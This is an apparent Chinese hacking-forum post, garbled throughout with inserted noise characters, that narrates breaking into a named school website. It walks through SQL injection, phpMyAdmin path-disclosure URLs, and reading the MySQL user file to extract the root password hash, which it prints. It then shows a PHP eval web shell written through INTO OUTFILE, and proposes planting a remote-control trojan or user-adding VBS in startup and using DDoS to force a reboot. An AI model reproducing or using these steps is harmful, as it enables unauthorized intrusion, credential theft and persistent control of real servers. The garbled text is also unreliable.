第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏/ m W; Z& ^* o9 d& \0 y( t
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
* j4 S8 P Z1 y& [4 P- u5 r. A1 i
J7 U2 c; V' S7 f% g, U a) R5 @! B. k
- X$ I C% M* F+ R" b5 h0 X5 q常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
0 Y3 v" [3 J' k) z1 w U1 P( ~) W. n) }% Z
那么想可以直接写入shell ,getshell有几个条件:: q% J4 i: `* p. ~/ s
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF 4 ]: y1 Y8 n: m; q- p
' p5 _& V" D f& k+ |0 s
试着爆绝对路径: 8 @: P& s$ [* W m0 n
1./phpMyAdmin/index.php?lang[]=1
8 _* H8 A2 o% e* _3 z2./phpMyAdmin/phpinfo.php 1 ]- E, f5 s p: u+ c
3./load_file()
% c5 C( Y3 x5 ]1 ?5 C3 E4./phpmyadmin/themes/darkblue_orange/layout.inc.php + T, C2 z' r$ s* P0 j1 R2 o7 c
5./phpmyadmin/libraries/select_lang.lib.php 6 W' C% f# T- \; [
6./phpmyadmin/libraries/lect_lang.lib.php
5 Z; `; {- E! u3 v5 S V7 l7./phpmyadmin/libraries/mcrypt.lib.php 6 Y* l- \) c! q( G) I: _8 S6 V
8./phpmyadmin/libraries/export/xls.php 1 l# m# }- L: J* V1 Y: X
# X6 N8 w" X& L, j5 G
均不行........................... + N8 @' |! U" P# C) n1 ^. {- W, E# e
/ n* N! W" i9 j$ E: ]8 r御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
( c6 W" A; s5 v2 S9 u' i2 Z a# u+ b) `
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
( w# ?3 Z4 N, i0 ^* |% g/ B3 \6 Y( l
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
+ F$ d6 a0 I, Z4 B9 V
, N/ {: i' K/ v5 X! @) m; c敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... ' X' \+ Y e. i a
& L7 M6 X# D# }) f6 K& H9 M
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell ) W l# @& _! U- ?0 E# t1 }
( L$ a5 s6 P, j$ a% [http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
! H8 c2 Y: L: M$ O
8 h+ _" i# X5 ]9 W# P自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD , m% p" g: D# ^) `
1 J3 u" b( {$ [- n; u7 f
成功读到root密码: 5 ]0 R2 k2 G+ G) n
# ]+ c' F" u# c9 \! K. V; M8 f17---- r(0072)
; B! W" p$ Z( N' [; ^* t4 C, f18---- o(006f) 5 E: Y5 w$ c% G
19---- o(006f) ! m) A; g$ J; j2 [
20---- t(0074) ) G0 m+ P& ~# [, S# ~% ^: y. T
21---- *(002a) 6 m: A8 K( a' j# M2 M4 f- ?3 n
22---- 8(0038) 0 g1 F) B) e4 t$ ]) f. k
23---- 2(0032)
6 A+ w8 {3 j$ d24---- E(0045) " n9 x+ @8 U+ B* o7 }
25---- 1(0031) ) y3 O: [5 v L2 @9 ^
26---- C(0043)
4 L& `2 l; I, f. n% r% H27---- 5(0035)
% {' T: @7 c3 ~0 C0 _6 C0 t: X5 B28---- 8(0038) * A6 L% i1 V! J( b0 K2 ~+ ?
29---- 2(0032)
+ j& |1 D# i7 N1 Q) J30---- 8(0038)
* c. m' s8 F/ U( K31---- A(0041) # p2 K# P/ {7 P( S: L8 p) R
32---- 9(0039)
1 W1 Y2 @2 {" a L- |, J8 n' u" [2 }33---- B(0042)
" u4 t, V& p+ W! D. B, S5 R3 w34---- 5(0035)
6 @" V& X$ o1 \& U: P35---- 4(0034) i' J! y- e4 a+ o8 _- |3 @
36---- 8(0038)
* k5 B. T! a* r37---- 6(0036)
& N' G" ?( _2 ]$ R- S* H38---- 4(0034)
8 v5 L" e; U6 d `; E- \39---- 9(0039)
) O4 ~% {/ C' u* C5 r7 `$ G2 I40---- 1(0031) $ x7 t. C6 P+ c8 B! c
41---- 1(0031) + Q3 {& D& ^3 n: ?0 K
42---- 5(0035)
/ V f& Z e) X; p% t0 t% a43---- 3(0033)
, D, Y/ q' K% q+ M! K/ g. f+ ?44---- 5(0035) 8 C8 A4 c5 h! B. ^) g
45---- 9(0039)
' h. ^8 Y/ i( X6 T# M% L. Z46---- 8(0038)
6 U# T |2 t+ d. w6 P+ d" s0 P47---- F(0046)
. J$ J6 ~1 z- W7 F' q* [% v48---- F(0046) % k* _" k+ d: \$ O1 J5 ]$ d
49---- 4(0034) ' o8 L5 V; U# z7 W4 t4 _+ v' k. x
50---- F(0046)
% g V7 C! N; `! G- I; J51---- 0(0030)
1 U I8 ?, r' K# i/ m- D52---- 3(0033) 7 e/ a, b$ ^6 e
53---- 2(0032) - K. N5 f5 V1 ^9 f
54---- A(0041) 6 p# y( u5 u. |# F7 ]
55---- 4(0034)
: }4 Y& ~' ]" ~/ U/ U! c56---- A(0041) # }, J1 ~ i4 d) [9 ?. r
57---- B(0042) * ?" S1 {/ t; R- {* z }4 C& j
58---- *(0044) 0 h& J! `+ U/ u" J
59---- *(0035)
; Q6 X1 ^5 z! H6 U8 V60---- *(0041) j( F; y4 d( ^7 V0 a& X
61---- *0032) 5 M( e6 j' S {
: ^2 }& Y' W( @4 D9 {! s& S解密后成功登陆phpmyamin + m, J. W7 D; o! r
8 `5 [3 A5 B! H- _& R% O. s' P5 T7 t
' ]$ x+ z0 g: b2 `: m8 ~. k$ f3 n! ]7 H9 q3 V5 Q4 W+ ~; B) Y. G# {* U) U+ ?
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
; A/ S0 v$ P! N0 l. s( G
$ [; L# _# Z: H: ]成功执行,拿下shell,菜刀连接: 2 M! @7 u$ b" `- L/ B
7 t3 p7 a) ?# l
服务器不支持asp,aspx,php提权无果...................
3 ]4 U* F$ V0 m# U! f: ~0 c2 u/ ~) a8 s: M/ q1 ~ [' \
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: 3 g; O: |* f: u' _. Z0 k: g$ @) O6 ^
服务器上已经有个隐藏帐号了 . ]. U% v$ G8 ] M
别名 administrators
7 p7 g4 n5 e( Q4 j3 a- b4 B) O5 S0 [注释 管理员对计算机/域有不受限制的完全访问权
$ ~, D. x6 q+ \, E4 a6 N成员 5 E; ]2 r# o7 P. y" T( F
-------------------------------------------------------------------------------$ w ]7 j, y" x" n4 g
admin( ~0 @& P$ |$ q# k, Q9 T) P1 V
Administrator% T, ~4 }1 y* m) C
slipper$; K& Q7 l" T2 v, k) B
sqluser' h9 Q( u7 V' v
命令成功完成。 3 q$ |1 T# e4 O( T& P
- n: S( @# m! x* w) I
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。5 w6 L% }5 ]( I# F9 q
) o. B( y; O1 ~+ V6 b; `9 h6 m0 t, cddos服务器重启,不然就只能坐等服务器重启了...............................4 ]# k; u' R# k E2 s
- P1 X0 J) m. O3 B
) u* ^7 [! ]5 d9 a
|